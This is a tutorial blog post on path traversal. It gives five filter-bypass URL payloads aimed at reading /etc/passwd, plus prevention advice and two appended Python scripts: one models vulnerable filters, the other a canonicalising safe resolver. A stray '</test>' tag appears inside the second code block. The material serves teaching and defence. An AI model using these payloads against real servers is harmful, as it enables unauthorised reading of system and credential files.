Path Traversal — A tour to the web server’s assets

infosecwriteups.com · PriOFF · 8 days ago · tutorial
PriOFF · ~3 min read · July 17, 2025 (Updated: July 17, 2025)

Path traversal, also known as directory traversal, is a vulnerability that can reveal sensitive information stored on the web server.

Path traversal is easy to find on vulnerable websites, and it lets an attacker read the content of files they were never meant to see: the passwd file, configuration files, database files, and so on. Before getting into the vulnerability itself, let's first understand what a "path" is in web terms.

[Image: structure of a URL]

As the image shows, the path comes after the domain (or top-level domain) and tells the server which file to serve to the client. So, as we change the path part of the URL, we can access different files stored on the server.

Assume we have a website that serves the cats.png file to the client:

https://www.example.com/images?file=cats.png

If the website runs on Linux, the actual location of cats.png on disk is typically something like this:

/var/www/images/cats.png

To reach the sensitive file /etc/passwd from that directory we have to go up three directory levels and then append /etc/passwd:

Original URL: https://www.example.com/images?file=cats.png
Updated URL: https://www.example.com/images?file=../../../etc/passwd

If the server joins the user-supplied value onto /var/www/images without checking it, the response contains /etc/passwd, which lists the local user accounts (the password hashes themselves live in /etc/shadow, which is readable only by root).

To prevent this kind of attack, websites apply various filters, but there are still ways to bypass some of them. Some techniques are shown below.

1. Use an absolute path

Try the absolute path of the file instead of the relative one. If the code does something like join(base_dir, file), many path-join functions discard the base directory entirely when the second argument is absolute.

Try this: https://www.example.com/images?file=/etc/passwd
Instead of this: https://www.example.com/images?file=../../../etc/passwd

Absolute path: /etc/passwd
Relative path: ../../../etc/passwd

2. Use URL encoding

Sometimes the server removes or rejects the "../" sequence, but the check runs on the raw query string before the framework URL-decodes it. Single encoding gets past that. If the application decodes the parameter a second time after the check, double encoding works too, because the once-decoded value still does not contain "../".

URL: https://www.example.com/images?file=../../../etc/passwd
Single URL-encoded: https://www.example.com/images?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
Double URL-encoded: https://www.example.com/images?file=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

Single encoding of ../ = %2e%2e%2f
Double encoding of ../ = %252e%252e%252f

3. Include the expected directory in the URL

Sometimes the filter only validates that the value starts with a specific directory.

URL: https://www.example.com/images?file=/var/www/images/cats.png

Here /var/www/images/ must be present at the start of the value. In that case, satisfy the prefix check and traverse from there:

https://www.example.com/images?file=/var/www/images/../../../etc/passwd

The check passes because the string starts with the expected directory; the filesystem then resolves the .. components and opens /etc/passwd.

4. Include the expected file extension in the URL

The server may require a specific file extension so that users can't read anything except images. On legacy platforms this can be bypassed with a null byte.

URL: https://www.example.com/images?file=cats.png

Here .png must be present at the end of the value. In that case, try this:

https://www.example.com/images?file=../../../etc/passwd%00.png

"%00" is the URL encoding of a null byte. The extension check, written in a high-level language, sees a string ending in .png, but the underlying C file API treats the null byte as the end of the string and opens ../../../etc/passwd. This only works where the runtime passes embedded null bytes through to the filesystem call; PHP, for example, has rejected them in its filesystem functions since 5.3.4, so treat this as a check for old stacks rather than something to expect everywhere.

5. Use ....// or ....\/ for traversal

The web server may strip the "../" string from the value, but if it does so in a single, non-recursive pass, you can nest one "../" inside another: write ....// and the stripping itself produces the ../ you wanted. ....\/ is the equivalent for a filter that strips the Windows-style ..\ sequence.

URL: https://www.example.com/images?file=....//....//....//etc/passwd

The server removes the "../" in the middle of each ....// segment:

..[../]/..[../]/..[../]/etc/passwd

After stripping, the value the server actually uses looks like this:

https://www.example.com/images?file=../../../etc/passwd

[Image: using the absolute path to read /etc/passwd]

How to prevent

Validate the user input before processing it. Ideally, compare the user input with a whitelist of permitted values. If that isn't possible, verify that the input contains only permitted content, such as alphanumeric characters only.

After validating the supplied input, append the input to the base directory and use a platform filesystem API to canonicalize the path. Verify that the canonicalized path starts with the expected base directory. Compare whole path components rather than a raw string prefix, so that /var/www/images-old is not accepted as lying under /var/www/images, and canonicalize the base directory too, so that a symlinked base still compares equal.

Absolute path: /var/www/images/../images/cats.png
Canonical path: /var/www/images/cats.png

#path-traversal #bug-bounty #vulnerability #owasp-top-10 #web-penetration-testing
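The five bypass techniques above each defeat a different naive filter. The following Python script is an added example, not code from the original article: it models each of those filters as a small function (a raw-query check, a decode-once check followed by a second decode, a directory-prefix check, an extension check handed to a NUL-terminated open, and a single-pass "../" strip) and feeds it the corresponding payload, so you can see which string each server would finally open. The base directory /var/www/images is the one from the article; the filter functions, their names and the "second decode" behaviour are assumptions about how such vulnerable code is typically written, not any specific product.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

BASE = "/var/www/images"  # web root from the article's cats.png example (assumed)


def open_path(value: str) -> str:
    """What the file-serving code finally opens: BASE joined with the value, lexically normalised.
    posixpath.join discards BASE when value is absolute, which is all technique 1 needs."""
    return posixpath.normpath(posixpath.join(BASE, value))


def filter_raw_query(raw: str) -> Optional[str]:
    """Technique 2, single encoding: the filter looks for '../' in the raw query string,
    and only afterwards does the framework URL-decode the parameter."""
    if "../" in raw:
        return None  # blocked
    return open_path(unquote(raw))


def filter_then_decode_again(raw: str) -> Optional[str]:
    """Technique 2, double encoding: framework decodes once, filter runs, then the
    application decodes a second time (a common bug) before opening the file."""
    once = unquote(raw)
    if "../" in once:
        return None
    return open_path(unquote(once))


def filter_require_prefix(value: str) -> Optional[str]:
    """Technique 3: insists the value starts with the images directory, never canonicalises."""
    if not value.startswith(BASE + "/"):
        return None
    return posixpath.normpath(value)  # the kernel resolves the '..' components the same way


def filter_require_png(value: str) -> Optional[str]:
    """Technique 4: checks the suffix, then hands the string to a NUL-terminated C open().
    Models legacy runtimes only (e.g. PHP before 5.3.4); current ones reject embedded NULs."""
    if not value.endswith(".png"):
        return None
    return open_path(value.split("\x00", 1)[0])  # what a C API sees: everything before the NUL


def filter_strip_once(value: str) -> Optional[str]:
    """Technique 5: deletes '../' in a single non-recursive pass, then opens the remainder."""
    return open_path(value.replace("../", ""))


def demo_bypasses() -> dict:
    """Each payload is the one the article gives for that technique; the 'plain_*' entries show
    that the same filters do stop a plain ../../../etc/passwd, which is why the bypass is needed."""
    dd = "%252e%252e%252f"  # '../' URL-encoded twice
    return {
        "absolute_path": open_path("/etc/passwd"),
        "single_encoded": filter_raw_query("%2e%2e%2f" * 3 + "etc%2fpasswd"),
        "double_encoded": filter_then_decode_again(dd * 3 + "etc%252fpasswd"),
        "required_prefix": filter_require_prefix(BASE + "/../../../etc/passwd"),
        "null_byte": filter_require_png(unquote("../../../etc/passwd%00.png")),
        "stuffed_dots": filter_strip_once("....//....//....//etc/passwd"),
        "legit": open_path("cats.png"),
        "plain_vs_raw_filter": filter_raw_query("../../../etc/passwd"),
        "plain_vs_strip_once": filter_strip_once("../../../etc/passwd"),
    }


if __name__ == "__main__":
    for technique, opened in demo_bypasses().items():
        print(f"{technique:>20}: {opened}")
```

Every bypass entry resolves to /etc/passwd, while the plain payload is either blocked outright or neutered to /var/www/images/etc/passwd. The point of the model is that none of these filters reason about the path the filesystem will actually resolve; they reason about the string they happen to see at one moment in the request pipeline.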
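The prevention advice above (allowlist the input, join it onto the base directory, canonicalise with a platform API, then verify the base directory) is implemented below as an added example that is not part of the original article. It uses os.path.realpath, which resolves both .. components and symlinks, and compares whole components with os.path.commonpath. The demo builds a throwaway directory with one image and a symlink pointing at /etc; that sandbox, the allowlist pattern and all function names are assumptions for illustration. It also goes one step beyond the article by contrasting the filesystem-backed check with a purely lexical os.path.normpath check, which cannot see through the symlink.

```python
import os
import re
import tempfile
from typing import Optional
from urllib.parse import unquote

# Allowlist for the cats.png use case (assumed): a bare image file name, no separators,
# no dots other than the extension.
ALLOWED_NAME = re.compile(r"[A-Za-z0-9_-]+\.(?:png|jpg|gif)")


def canonical_within(base_dir: str, user_value: str) -> Optional[str]:
    """Join user_value onto base_dir, canonicalise with os.path.realpath (a platform API that
    resolves '..' and follows symlinks) and return the path only if it is still under base_dir.
    The base is canonicalised too, so a symlinked base directory compares equal to itself."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_value))
    # commonpath compares whole components, so /var/www/images-old is not "under"
    # /var/www/images; a plain str.startswith prefix test would get that wrong.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def lexical_within(base_dir: str, user_value: str) -> Optional[str]:
    """For contrast only: the same check done with os.path.normpath, which rewrites the string
    but never consults the filesystem, so a symlink inside base_dir escapes it unnoticed."""
    base = os.path.normpath(base_dir)
    candidate = os.path.normpath(os.path.join(base, user_value))
    return candidate if os.path.commonpath([base, candidate]) == base else None


def safe_resolve(base_dir: str, decoded_param: str) -> Optional[str]:
    """The full check in the article's order: allowlist first, then canonicalise and verify.
    decoded_param is the value after the framework's single URL-decode; it is deliberately
    not decoded again here, which is what makes double encoding harmless."""
    if "\x00" in decoded_param or not ALLOWED_NAME.fullmatch(decoded_param):
        return None
    return canonical_within(base_dir, decoded_param)


def demo() -> dict:
    """Constructed sandbox (not a real deployment): a base directory holding one image and a
    symlink named 'link' pointing at /etc, the classic way a traversal survives a lexical check."""
    with tempfile.TemporaryDirectory() as tmp:
        images = os.path.join(tmp, "images")
        os.mkdir(images)
        with open(os.path.join(images, "cats.png"), "wb") as fh:
            fh.write(b"\x89PNG")
        os.symlink("/etc", os.path.join(images, "link"))
        base = os.path.realpath(images)
        return {
            "legit": safe_resolve(images, "cats.png") == os.path.join(base, "cats.png"),
            "relative": safe_resolve(images, "../../../etc/passwd"),
            "absolute": safe_resolve(images, "/etc/passwd"),
            "double_encoded": safe_resolve(images, unquote("%252e%252e%252fetc%252fpasswd")),
            "null_byte": safe_resolve(images, unquote("../../../etc/passwd%00.png")),
            "stuffed": safe_resolve(images, "....//....//....//etc/passwd"),
            # Canonical check alone, without the allowlist, still stops the article's payloads:
            "relative_canonical": canonical_within(images, "../../../etc/passwd"),
            "prefix_only": canonical_within(images, base + "/../../../etc/passwd"),
            # Lexical check accepts the symlink path; the realpath-based check rejects it.
            "symlink_lexical": lexical_within(images, "link/passwd"),
            "symlink_canonical": canonical_within(images, "link/passwd"),
        }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:>20}: {result}")
</test>
```

The allowlist rejects every payload from the bypass section before a filesystem call happens; the canonical check is the second layer, and the symlink case shows why the article insists on a platform API rather than string cleanup: lexical_within happily returns a path under images/, while canonical_within sees that it really resolves to /etc/passwd.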